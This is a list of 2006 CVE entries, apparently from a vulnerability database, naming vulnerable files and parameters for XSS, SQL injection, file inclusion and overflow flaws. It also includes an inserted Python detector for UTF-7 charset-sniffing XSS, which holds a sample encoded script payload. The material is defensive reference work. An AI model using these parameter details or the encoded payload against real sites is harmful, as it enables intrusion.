[CVE-2006-6179] Buffer overflow in PCCSRV\Web_console\RemoteInstallCGI\CgiRemoteInstall.exe for Trend Micro OfficeScan 7.3 before build 7.3.0.1089 allows remote attackers to execute arbitrary code via unknown attack vectors.
[CVE-2006-6178] Buffer overflow in PCCSRV\Web_console\RemoteInstallCGI\Wizard.exe for Trend Micro OfficeScan 7.3 before build 7.3.0.1087 allows remote attackers to execute arbitrary code via unknown attack vectors.
[CVE-2006-6176] Cross-site scripting (XSS) vulnerability in admin.php in Blogn before 1.9.4 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2006-6174] Cross-site scripting (XSS) vulnerability in tDiary before 2.0.3 and 2.1.x before 2.1.4.20061126 allows remote attackers to inject arbitrary web script or HTML via the conf parameter in (1) tdiary.rb and (2) skel/conf.rhtml.
[CVE-2006-6166] Cross-site scripting (XSS) vulnerability in jce.php in the JCE Admin Component in Ryan Demmer Joomla Content Editor (JCE) 1.0.4 for Joomla! (com_jce), without the 20060821 jce_patch, allows remote attackers to inject arbitrary web script or HTML via the mosConfig_live_site parameter.
[CVE-2006-6162] Cross-site scripting (XSS) vulnerability in tiki-edit_structures.php in TikiWiki 1.9.6 allows remote attackers to inject arbitrary web script or HTML via the pageAlias parameter. NOTE: The provenance of this information is unknown
[CVE-2006-6159] Multiple cross-site scripting (XSS) vulnerabilities in newticket.php in DeskPRO 2.0.0 and 2.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) message or (2) subject parameter.
[CVE-2006-6158] Multiple cross-site scripting (XSS) vulnerabilities in (a) PMOS Help Desk 2.4, formerly (b) InverseFlow Help Desk 2.31 and also sold as (c) Ace Helpdesk 2.31, allow remote attackers to inject arbitrary web script or HTML via the (1) id or email parameter to ticketview.php, or (2) the email parameter to ticket.php.
[CVE-2006-6156] Cross-site scripting (XSS) vulnerability in auth/message.php in HIOX Star Rating System Script (HSRS) 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string (PHP_SELF). NOTE: The provenance of this information is unknown
[CVE-2006-6153] Multiple cross-site scripting (XSS) vulnerabilities in vSpin.net Classified System 2004 allow remote attackers to inject arbitrary web script or HTML via the (1) catname parameter to cat.asp or the (2) minprice parameter to search.asp.
[CVE-2006-6148] Multiple cross-site scripting (XSS) vulnerabilities in submitlink.asp in JiRos Links Manager allow remote attackers to inject arbitrary web script or HTML via the (1) lName, (2) lURL, (3) lImage, and (4) lDescription parameters. NOTE: some of these details are obtained from third party information.
[CVE-2006-6144] The "mechglue" abstraction interface of the GSS-API library for Kerberos 5 1.5 through 1.5.1, as used in Kerberos administration daemon (kadmind) and other products that use this library, allows remote attackers to cause a denial of service (crash) via unspecified vectors that cause mechglue to free uninitialized pointers.
[CVE-2006-6142] Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.0 through 1.4.9 allow remote attackers to inject arbitrary web script or HTML via the (1) mailto parameter in (a) webmail.php, the (2) session and (3) delete_draft parameters in (b) compose.php, and (4) unspecified vectors involving "a shortcoming in the magicHTML filter."
[CVE-2006-6136] IBM WebSphere Application Server 6.1.0 before Fix Pack 3 (6.1.0.3) does not perform EAL4 authentication checks at the proper time during "registering of response operation," which has unknown impact and attack vectors.
[CVE-2006-6135] Multiple unspecified vulnerabilities in IBM WebSphere Application Server 6.1.0 before Fix Pack 3 (6.1.0.3) have unknown impact and attack vectors, related to (1) a "Potential security vulnerability" (PK29725) and (2) "Potential security exposure" (PK30831).
[CVE-2006-6131] Untrusted search path vulnerability in (1) WSAdminServer and (2) WSWebServer in Kerio WebSTAR (4D WebSTAR Server Suite) 5.4.2 and earlier allows local users with webstar privileges to gain root privileges via a malicious libucache.dylib helper library in the current working directory.
[CVE-2006-6124] Cross-site scripting (XSS) vulnerability in SeleniumServer Web Server 1.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the provenance of this information is unknown
[CVE-2006-6118] Cross-site scripting (XSS) vulnerability in thumbs.php in mmgallery 1.55 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-6108] Cross-site scripting (XSS) vulnerability in EC-CUBE before 1.0.1a-beta allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-6104] The System.Web class in the XSP for ASP.NET server 1.1 through 2.0 in Mono does not properly verify local pathnames, which allows remote attackers to (1) read source code by appending a space (%20) to a URI, and (2) read credentials via a request for Web.Config%20.
[CVE-2006-6096] Cross-site scripting (XSS) vulnerability in activenews_search.asp in ActiveNews Manager allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2006-6091] Cross-site scripting (XSS) vulnerability in Grim Pirate GrimBB before 2006_11_21 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-6089] Multiple cross-site scripting (XSS) vulnerabilities in addpost1.asp in BaalAsp forum allow remote attackers to inject arbitrary web script or HTML via the (1) title (Subject), (2) groupname (Group Name), or (3) detail (Message) field.
[CVE-2006-6088] Multiple cross-site scripting (XSS) vulnerabilities in BlueCollar i-Gallery 3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) n or (2) d parameter in igallery.asp, or (3) an unspecified parameter related to search, possibly the Search Gallery field, or the myquery parameter, in search.asp. NOTE: some of these details are obtained from third party information.
[CVE-2006-6087] Cross-site scripting (XSS) vulnerability in weblog.php in my little weblog allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2006-6082] Multiple cross-site scripting (XSS) vulnerabilities in CreaScripts Creadirectory allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to addlisting.asp or the (2) search parameter to search.asp.
[CVE-2006-6075] Cross-site scripting (XSS) vulnerability in addpost1.asp in BaalAsp forum allows remote attackers to inject arbitrary web script or HTML via the name parameter. NOTE: The provenance of this information is unknown
[CVE-2006-6074] Multiple SQL injection vulnerabilities in Enthrallweb eShopping Cart allow remote attackers to execute arbitrary SQL commands via (1) the ProductID parameter in (a) reviews.asp, or the (2) cat_id or (3) sub_id parameter in (b) subProducts.asp. NOTE: the productdetail.asp vector is already covered by another identifier.
[CVE-2006-6073] Multiple SQL injection vulnerabilities in Enthrallweb eShopping Cart allow remote attackers to execute arbitrary SQL commands via the (1) ProductID parameter in productdetail.asp or the (2) categoryid parameter in products.asp.
[CVE-2006-6046] Multiple cross-site scripting (XSS) vulnerabilities in eggblog 3.1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) edit parameter to (a) admin/articles.php or (b) admin/comments.php, or the (2) add parameter to admin/users.php.
[CVE-2006-6043] PHP file inclusion vulnerability in loginform-inc.php in Oliver (formerly Webshare) 1.2.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a UNC share pathname or a local file pathname in the conf[motdfile] parameter, which is accessed by the file_exists function.
[CVE-2006-6042] PHP remote file inclusion vulnerability in core/editor.php in phpWebThings 1.5.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the editor_insert_bottom parameter.
[CVE-2006-6040] Multiple cross-site scripting (XSS) vulnerabilities in admincp/index.php in Jelsoft vBulletin 3.6.x allow remote attackers to inject arbitrary web script or HTML via (1) the prefs parameter in a buildnavprefs action or (2) the navprefs parameter in a savenavprefs action.
[CVE-2006-6037] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Dan Jensen Travelsized CMS 0.4.1 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) page, (2) page_id, or (3) language parameter.
[CVE-2006-6035] Cross-site scripting (XSS) vulnerability in list.php in BLOG:CMS 4.1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the FADDR parameter.
[CVE-2006-6032] Multiple cross-site scripting (XSS) vulnerabilities in Simple PHP Blog (SPHPBlog), probably 0.4.8, allow remote attackers to inject arbitrary web script or HTML via (1) the action parameter in add_block.php or (2) the entry parameter in index.php, different vectors than CVE-2005-1135. NOTE: this has been reported to affect 0.8, but as of 20061121, the most recent version is only 0.4.9.
[CVE-2006-6022] Cross-site scripting (XSS) vulnerability in login_form.asp in BestWebApp Dating Site allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2006-6021] SQL injection vulnerability in the login component in BestWebApp Dating Site allows remote attackers to execute arbitrary SQL commands via the (1) username and (2) passwd parameters.
[CVE-2006-6020] Cross-site scripting (XSS) vulnerability in announce.php in Blog Torrent Preview 0.92 allows remote attackers to inject arbitrary web script or HTML via the left parameter.
[CVE-2006-6019] Cross-site scripting (XSS) vulnerability in extensions/googiespell/googlespell_proxy.php in Bill Roberts Bloo 1.0 allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
[CVE-2006-6012] Cross-site scripting (XSS) vulnerability in csm/asp/listings.asp in MGinternet Car Site Manager (CSM) allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: the provenance of this information is unknown
[CVE-2006-6011] Unspecified vulnerability in SAP Web Application Server before 6.40 patch 6 allows remote attackers to cause a denial of service (enserver.exe crash) via a certain UDP packet to port 64999, aka "two bytes UDP crash," a different vulnerability than CVE-2006-5785.
[CVE-2006-6007] save_profile.asp in WebEvents (Online Event Registration Template) 2.0 and earlier allows remote attackers to change the profiles, passwords, and other information for arbitrary users via a modified UserID parameter.
[CVE-2006-5991] Multiple SQL injection vulnerabilities in wwweb concepts CactuShop allow remote attackers to execute arbitrary SQL commands via the (1) prodtype parameter in prodtype.asp and the (2) product parameter in product.asp.
[CVE-2006-5985] Multiple cross-site scripting (XSS) vulnerabilities in admin/options.php in Extreme CMS 0.9, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) bg1, (2) bg2, (3) text, or (4) size parameters. NOTE: the provenance of this information is unknown
[CVE-2006-5984] Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3.2.10 allow remote authenticated users to inject arbitrary web script or HTML via the (1) txtCompanyName, (2) txtEmail, or (3) txtUserAccNum parameter to (a) users.asp, or the (4) setThemeColour parameter to (b) default.asp in the Reseller and Admin levels
[CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
[CVE-2006-5975] Multiple cross-site scripting (XSS) vulnerabilities in comments.asp in BlogMe 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) URL, or (3) Comments field.
[CVE-2006-5960] Multiple cross-site scripting (XSS) vulnerabilities in account_login.asp in A+ Store E-Commerce allow remote attackers to inject arbitrary web script or HTML via the (1) username (txtUserName) and (2) password (txtPassword) parameters. NOTE: portions of these details are obtained from third party information.
[CVE-2006-5958] Multiple cross-site scripting (XSS) vulnerabilities in INFINICART allow remote attackers to inject arbitrary web script or HTML via the (1) username and (2) password fields in (a) login.asp, (3) search field in (b) search.asp, and (4) email field in (c) sendpassword.asp.
[CVE-2006-5944] Cross-site scripting (XSS) vulnerability in csm/asp/listings.asp in MGinternet Car Site Manager (CSM) allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2006-5943] Multiple SQL injection vulnerabilities in inventory/display/imager.asp in Website Designs for Less Inventory Manager allow remote attackers to execute arbitrary SQL commands via the (1) pictable, (2) picfield, or (3) where parameter.
[CVE-2006-5942] Cross-site scripting (XSS) vulnerability in inventory/display/display_results.asp in Website Designs For Less Inventory Manager allows remote attackers to inject arbitrary web script or HTML via the category parameter.
[CVE-2006-5931] Multiple PHP remote file inclusion vulnerabilities in Aigaion Web based bibliography management system 1.2.1, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to certain PHP scripts in (1) lib/actions/, (2) lib/displays/, (3) lib/editforms/, (4) lib/functions/, (5) scheme/, and (6) the root directory. NOTE: the provenance of this information is unknown
[CVE-2006-5930] Multiple PHP remote file inclusion vulnerabilities in Aigaion Web based bibliography management system 1.2.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to (1) _basicfunctions.php, or (2) pageactionauthor.php.
[CVE-2006-5925] Links web browser 1.00pre12 and Elinks 0.9.2 with smbclient installed allow remote attackers to execute arbitrary code via shell metacharacters in an smb:// URI, as demonstrated by using PUT and GET statements.
[CVE-2006-5924] Cross-site scripting (XSS) vulnerability in index.php in Efficient IP iPmanager (IPm) 2.3 allows remote attackers to inject arbitrary web script or HTML via the errmsg parameter. NOTE: the provenance of this information is unknown
[CVE-2006-5921] Multiple cross-site scripting (XSS) vulnerabilities in add_comment.php in Wheatblog (wB) allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) WWW, and (3) Comment fields. NOTE: this issue may overlap CVE-2006-5195.
[CVE-2006-5918] Unrestricted file upload vulnerability in RapidKill (aka PHP Rapid Kill) 5.7 Pro, and certain other versions, allows remote attackers to upload and execute arbitrary PHP scripts via the "Link to Download" field. NOTE: it is possible that the field value is restricted to files on specific public web sites.
[CVE-2006-5915] Multiple cross-site scripting (XSS) vulnerabilities in ls.php in SAMEDIA LandShop allow remote attackers to inject arbitrary web script or HTML via the (1) start, (2) CAT_ID, (3) keyword, (4) search_area, (5) search_type, (6) infield, or (7) search_order parameter.
[CVE-2006-5913] Microsoft Internet Explorer 7 allows remote attackers to (1) cause a security certificate from a secure web site to appear invalid via a link to res://ieframe.dll/sslnavcancel.htm with the target site in the anchor identifier, which displays the site's URL in the address bar but causes Internet Explorer to report that the certificate is invalid, or (2) trigger a "The webpage no longer exists" report via a link to res://ieframe.dll/http_410.htm, a variant of CVE-2006-5805.
[CVE-2006-5905] Web Directory Pro allows remote attackers to (1) backup the database and obtain the backup via a direct request to admin/backup_db.php or (2) modify configuration via a direct request to admin/options.php.
[CVE-2006-5900] Cross-site scripting (XSS) vulnerability in the incubator/tests/Zend/Http/_files/testRedirections.php sample code in Zend Framework Preview 0.2.0 allows remote attackers to inject arbitrary web script or HTML via arbitrary parameters.
[CVE-2006-5896] REMLAB Web Mech Designer 2.0.5 allows remote attackers to obtain the full path of the script via an incorrect Tonnage parameter to calculate.php that triggers a divide-by-zero error, which leaks the path in an error message.
[CVE-2006-5883] Multiple cross-site scripting (XSS) vulnerabilities in cPanel 10 allow remote authenticated users to inject arbitrary web script or HTML via the (1) dir parameter in (a) seldir.html, and the (2) user and (3) dir parameters in (b) newuser.html.
[CVE-2006-5860] Cross-site scripting (XSS) vulnerability in the administrator console for Adobe JRun 4.0, as used in ColdFusion, allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2006-5859] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion MX 7 7.0 and 7.0.1, when Global Script Protection is not enabled, allows remote attackers to inject arbitrary HTML and web script via unknown vectors, possibly related to Linkdirect.cfm, Topnav.cfm, and Welcomedoc.cfm.
[CVE-2006-5853] Cross-site scripting (XSS) vulnerability in logon.aspx in Immediacy CMS (Immediacy .NET CMS) 5.2 allows remote attackers to inject arbitrary web script or HTML via the lang parameter, which is returned to the client in a lang cookie.
[CVE-2006-5850] Stack-based buffer overflow in Essentia Web Server 2.15 for Windows allows remote attackers to execute arbitrary code via a long URI, as demonstrated by a GET or HEAD request. NOTE: some of these details are obtained from third party information.
[CVE-2006-5847] Cross-site scripting (XSS) vulnerability in index.php in FreeWebshop 2.2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2006-5846] Directory traversal vulnerability in index.php in FreeWebshop 2.2.2 and earlier allows remote attackers to read and include arbitrary files via a .. (dot dot) in the page parameter, a different vector than CVE-2006-5773.
[CVE-2006-5844] Speedywiki 2.0 allows remote attackers to obtain the full path of the web server via the (1) showRevisions[] and (2) searchText[] parameters in (a) index.php, and (b) a direct request to upload.php without any parameters.
[CVE-2006-5843] Cross-site scripting (XSS) vulnerability in index.php in Speedywiki 2.0 allows remote attackers to inject arbitrary web script or HTML via the showRevisions parameter.
[CVE-2006-5832] All In One Control Panel (AIOCP) 1.3.007 and earlier allows remote attackers to obtain the full path of the web server via certain requests to (1) public/code/cp_dpage.php, possibly involving the aiocp_dp[] parameter, (2) public/code/cp_show_ec_products.php, possibly involving the order_field[] parameter, and (3) public/code/cp_show_page_help.php, possibly involving the hp[] parameter, which reveal the path in various error messages.
[CVE-2006-5830] Multiple cross-site scripting (XSS) vulnerabilities in All In One Control Panel (AIOCP) 1.3.007 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) topid, (2) forid, and (3) catid parameters to code/cp_forum_view.php
[CVE-2006-5827] Multiple cross-site scripting (XSS) vulnerabilities in index.php in phpComasy CMS 0.7.9pre and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) username or (2) password parameters.
[CVE-2006-5825] Cross-site scripting (XSS) vulnerability in index.php in Kayako SupportSuite 3.00.32 allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2006-5819] Verity Ultraseek before 5.7 allows remote attackers to use the server as a proxy for web attacks and host scanning via a direct request to the highlight/index.html script.
[CVE-2006-5816] Multiple PHP remote file inclusion vulnerabilities in Dmitry Sheiko Business Card Web Builder (BCWB) 2.5 allow remote attackers to execute arbitrary PHP code via a URL in the root_path_admin parameter to (1) /include/startup.inc.php, (2) dcontent/default.css.php, or (3) system/default.css.php, different vectors than CVE-2006-4946.
[CVE-2006-5810] Cross-site scripting (XSS) vulnerability in modules/wfdownloads/newlist.php in XOOPS 1.0 allows remote attackers to inject arbitrary web script or HTML via the newdownloadshowdays parameter.
[CVE-2006-5806] SSL VPN Client in Cisco Secure Desktop before 3.1.1.45, when configured to spawn a web browser after a successful connection, stores sensitive browser session information in a directory outside of the CSD vault and does not restrict the user from saving files outside of the vault, which is not cleared after the VPN connection terminates and allows local users to read unencrypted data.
[CVE-2006-5805] Microsoft Internet Explorer 7 allows remote attackers to cause a security certificate from a secure web site to appear invalid via a link to res://ieframe.dll/invalidcert.htm with the target site as an argument, which displays the site's URL in the address bar but causes Internet Explorer to report that the certificate is invalid.
[CVE-2006-5802] SQL injection vulnerability in message_details.php in The Web Drivers Simple Forum, dated 20060318, allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2006-5800] Cross-site scripting (XSS) vulnerability in default.asp in xenis.creator CMS allows remote attackers to inject arbitrary web script or HTML via the nav parameter. NOTE: the provenance of this information is unknown
[CVE-2006-5799] Multiple cross-site scripting (XSS) vulnerabilities in default.asp in xenis.creator CMS allow remote attackers to inject arbitrary web script or HTML via the (1) contid or (2) search parameters.
[CVE-2006-5795] Multiple PHP remote file inclusion vulnerabilities in OpenEMR 2.8.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the srcdir parameter to (a) billing_process.php, (b) billing_report.php, (c) billing_report_xml.php, and (d) print_billing_report.php in interface/billing/
[CVE-2006-5791] Multiple cross-site scripting (XSS) vulnerabilities in elogd.c in ELOG 2.6.2 and earlier allow remote attackers to inject arbitrary HTML or web script via (1) the filename for downloading, which is not quoted in an error message by the send_file_direct function, and (2) the Type or Category values in a New entry, which is not properly handled in an error message by the submit_elog function.
[CVE-2006-5785] Unspecified vulnerability in SAP Web Application Server 6.40 before patch 136 and 7.00 before patch 66 allows remote attackers to cause a denial of service (enserver.exe crash) via a 0x72F2 sequence on UDP port 64999.
[CVE-2006-5784] Unspecified vulnerability in enserver.exe in SAP Web Application Server 6.40 before patch 136 and 7.00 before patch 66 allows remote attackers to read arbitrary files via crafted data on a "3200+SYSNR" TCP port, as demonstrated by port 3201. NOTE: this issue can be leveraged by local users to access a named pipe as the SAPServiceJ2E user.
[CVE-2006-5776] ** DISPUTED ** Multiple PHP remote file inclusions in Ariadne 2.4.1 allow remote attackers to execute arbitrary PHP code via the ariadne parameter in (1) ftp/loader.php and (2) lib/includes/loader.cmd.php. NOTE: this issue is disputed by CVE, since installation instructions recommend that the files be placed outside of the web document root and require the administrator to modify $ariadne in an include file.
[CVE-2006-5775] Cross-site scripting (XSS) vulnerability in profile.php in FunkBoard 0.71 before 4 November 2006 at 18:16 GMT allows remote attackers to inject arbitrary web script or HTML, possibly via the name parameter.
[CVE-2006-5774] Cross-site scripting (XSS) vulnerability in Hyper NIKKI System before 2.19.9 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2006-5773] Directory traversal vulnerability in index.php in FreeWebshop 2.2.1 and earlier allows remote attackers to read arbitrary files and disclose the installation path via a .. (dot dot) in the action parameter.
[CVE-2006-5772] Multiple SQL injection vulnerabilities in index.php in FreeWebshop 2.2.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) password and (2) prod parameters.
[CVE-2006-5771] Cross-site scripting (XSS) vulnerability in Arkoon SSL360 1.0 and 2.0 before 2.0/2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-5770] Multiple cross-site scripting (XSS) vulnerabilities in ac4p Mobile allow remote attackers to inject arbitrary web script or HTML via the (1) Bloks, (2) Newnews, (3) lBlok, or (4) foooot parameter in (a) index.php
[CVE-2006-5769] Multiple cross-site scripting (XSS) vulnerabilities in admin.tool CMS 3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) fSid or (2) fSrcBegriffe parameters in unspecified vectors.
[CVE-2006-5761] Cross-site scripting (XSS) vulnerability in index.php in Rhadrix If-CMS 1.01 and 2.07 allows remote attackers to inject arbitrary web script or HTML via the rns parameter.
[CVE-2006-5759] index.php in Rhadrix If-CMS, possibly 1.01 and 2.07, allows remote attackers to obtain the full path of the web server via empty (1) rns[] or (2) pag[] arguments, which reveals the path in an error message.
[CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
[CVE-2006-5744] Multiple SQL injection vulnerabilities in Highwall Enterprise and Highwall Endpoint 4.0.2.11045 management interface allow remote attackers to execute arbitrary SQL commands via an Access Point with a crafted SSID, and via unspecified vectors related to a malicious system operator.
[CVE-2006-5742] The AirMagnet Enterprise console and Remote Sensor console (Laptop) in AirMagnet Enterprise before 7.5 build 6307 allows remote attackers to inject arbitrary web script or HTML from a certain embedded Internet Explorer object into an SSID template value, aka "Cross-Application Scripting (XAS)".
[CVE-2006-5741] Multiple cross-site scripting (XSS) vulnerabilities in AirMagnet Enterprise before 7.5 build 6307 allow remote attackers to inject arbitrary web script or HTML via (1) the 404 error page of the Smart Sensor Edge Sensor
[CVE-2006-5718] Cross-site scripting (XSS) vulnerability in error.php in phpMyAdmin 2.6.4 through 2.9.0.2 allows remote attackers to inject arbitrary web script or HTML via UTF-7 or US-ASCII encoded characters, which are injected into an error message, as demonstrated by a request with a utf7 charset parameter accompanied by UTF-7 data.
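The phpMyAdmin entry above (CVE-2006-5718) and the mod_status entry (CVE-2006-5752) describe the same mechanism: when a response declares no charset, some browsers guess one, and a UTF-7 guess turns a payload that contains no `<` or `>` into live markup, so HTML-escaping the echoed text does not stop it. The following check is an added example, not code from phpMyAdmin, Apache or vulscan; the response headers, the error-page body and the echoed UTF-7 string are constructed for the demonstration.

```python
"""Flag responses that leave the charset to browser sniffing and carry UTF-7 markup."""
import re

_CT_CHARSET = re.compile(r"charset\s*=\s*[\"']?([\w-]+)", re.IGNORECASE)
_META_CHARSET = re.compile(r"<meta[^>]*charset\s*=\s*[\"']?([\w-]+)", re.IGNORECASE)
# A UTF-7 shift sequence: "+" then modified base64, ended by "-" (or any non-base64 char).
_UTF7_SHIFT = re.compile(r"\+[A-Za-z0-9+/]+-?")


def declared_charset(headers, body):
    """Charset the response actually declares, or None if it is left to sniffing."""
    for name, value in headers:
        if name.lower() == "content-type":
            m = _CT_CHARSET.search(value)
            if m:
                return m.group(1).lower()
    m = _META_CHARSET.search(body)
    return m.group(1).lower() if m else None


def utf7_decode_shifts(text):
    """Decode only the UTF-7 shift sequences; all other text is left as it is."""
    def decode_one(m):
        seq = m.group(0)
        if not seq.endswith("-"):
            seq += "-"
        return seq.encode("ascii").decode("utf-7", "ignore")
    return _UTF7_SHIFT.sub(decode_one, text)


def utf7_smuggles_markup(body):
    """True if UTF-7 decoding yields tags that the raw text does not contain."""
    return utf7_decode_shifts(body).count("<") > body.count("<")


def charset_sniffing_risk(headers, body):
    """At risk when no charset is declared and the body decodes to extra markup."""
    return declared_charset(headers, body) is None and utf7_smuggles_markup(body)


# Constructed sample: an error page that echoes a request parameter. The echoed
# text contains no "<" or ">" at all, so output escaping alone would pass it.
ECHOED = "+ADw-script+AD4-alert(1)+ADw-/script+AD4-"
BODY = "<html><body>Error: unknown charset " + ECHOED + "</body></html>"
NO_CHARSET = [("Content-Type", "text/html")]
WITH_CHARSET = [("Content-Type", "text/html; charset=utf-8")]

if __name__ == "__main__":
    print("decoded payload:", utf7_decode_shifts(ECHOED))
    print("risk without charset:", charset_sniffing_risk(NO_CHARSET, BODY))
    print("risk with charset:   ", charset_sniffing_risk(WITH_CHARSET, BODY))
```

The fix the two entries imply is on the server side: send an explicit `charset=` in `Content-Type` (or a `<meta charset>` early in the document) on every HTML response, including error pages, so the browser never has to guess.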
[CVE-2006-5717] Multiple cross-site scripting (XSS) vulnerabilities in Zend Google Data Client Library (ZendGData) Preview 0.2.0 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters in (1) basedemo.php and (2) calenderdemo.php in samples/, and other unspecified files.
[CVE-2006-5715] Easy File Sharing (EFS) Easy Address Book 1.2, when run on an NTFS file system, allows remote attackers to read arbitrary files under the web root by appending "::$DATA" to the end of an HTTP GET request, which accesses the alternate data stream.
[CVE-2006-5714] Easy File Sharing (EFS) Web Server 4.0, when running on an NTFS file system, allows remote attackers to read arbitrary files under the web root by appending "::$DATA" to the end of an HTTP GET request, which accesses the alternate data stream.
[CVE-2006-5713] Cross-site scripting (XSS) vulnerability in Easy File Sharing (EFS) Web Server 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) author, (2) content, or (3) title parameters when posting a forum thread. NOTE: the provenance of this information is unknown
[CVE-2006-5712] Cross-site scripting (XSS) vulnerability in Mirapoint WebMail allows remote attackers to inject arbitrary web script via the expression Cascading Style Sheets (CSS) function, as demonstrated using the width style for an IMG element.
[CVE-2006-5703] Cross-site scripting (XSS) vulnerability in tiki-featured_link.php in Tikiwiki 1.9.5 allows remote attackers to inject arbitrary web script or HTML via a url parameter that evades filtering, as demonstrated by a parameter value containing malformed, nested SCRIPT elements.
[CVE-2006-5702] Tikiwiki 1.9.5 allows remote attackers to obtain sensitive information (MySQL username and password) via an empty sort_mode parameter in (1) tiki-listpages.php, (2) tiki-lastchanges.php, (3) messu-archive.php, (4) messu-mailbox.php, (5) messu-sent.php, (6) tiki-directory_add_site.php, (7) tiki-directory_ranking.php, (8) tiki-directory_search.php, (9) tiki-forums.php, (10) tiki-view_forum.php, (11) tiki-friends.php, (12) tiki-list_blogs.php, (13) tiki-list_faqs.php, (14) tiki-list_trackers.php, (15) tiki-list_users.php, (16) tiki-my_tiki.php, (17) tiki-notepad_list.php, (18) tiki-orphan_pages.php, (19) tiki-shoutbox.php, (20) tiki-usermenu.php, and (21) tiki-webmail_contacts.php, which reveal the information in certain database error messages.
[CVE-2006-5672] PHP remote file inclusion vulnerability in web/init_mysource.php in MySource CMS 2.16.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the INCLUDE_PATH parameter.
[CVE-2006-5661] Cross-site scripting (XSS) vulnerability in nquser.php in VIRtech Netquery allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header.
[CVE-2006-5658] BlooMooWeb ActiveX control (AidemATL.dll) allows remote attackers to (1) download arbitrary files via a URL in the bstrUrl parameter to the BW_DownloadFile method, (2) execute arbitrary local files via a file path in the bstrParams parameter to the BW_LaunchGame method, and (3) delete arbitrary files via a file path in the filePath parameter to the BW_DeleteTempFile method.
[CVE-2006-5654] Unspecified vulnerability in the Network Security Services (NSS) in Sun Java System Web Server 6.0 before SP 10 and ONE Application Server 7 before Update 3, when SSLv2 is enabled, allows remote authenticated users to cause a denial of service (application crash) via unspecified vectors. NOTE: due to lack of details from the vendor, it is unclear whether this is related to vector 1 in CVE-2006-5201 or CVE-2006-3127.
[CVE-2006-5653] Cross-site scripting (XSS) vulnerability in the errorHTML function in the index script in Sun Java System Messenger Express 6 allows remote attackers to inject arbitrary web script or HTML via the error parameter. NOTE: this issue might be related to CVE-2006-5486, however due to the vagueness of the initial advisory and different researchers a new CVE was assigned.
[CVE-2006-5652] Cross-site scripting (XSS) vulnerability in Sun iPlanet Messaging Server Messenger Express allows remote attackers to inject arbitrary web script via the expression Cascading Style Sheets (CSS) function, as demonstrated by setting the width style for an IMG element. NOTE: this issue might be related to CVE-2006-5486, however due to the vagueness of the initial advisory and different researchers, it has been assigned a new CVE.
[CVE-2006-5643] Cross-site scripting (XSS) vulnerability in search_de.html in foresite CMS allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2006-5639] Unspecified vulnerability in the random number generator in OpenWBEM (Web Based Enterprise Management) 3.2.0 allows attackers to gain privileges via vectors related to "local or HTTP Digest authentication."
[CVE-2006-5636] PHP remote file inclusion vulnerability in common.php in Simple Website Software (SWS) 0.99 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the SWSDIR parameter.
[CVE-2006-5635] SQL injection vulnerability in forum/search.asp in Web Wiz Forums allows remote attackers to execute arbitrary SQL commands via the KW parameter.
[CVE-2006-5632] Cross-site scripting (XSS) vulnerability in change_pass.php in iG Shop 1.4 allows remote attackers to inject arbitrary web script or HTML via the id parameter, a different vulnerability than CVE-2006-5631. NOTE: the provenance of this information is unknown
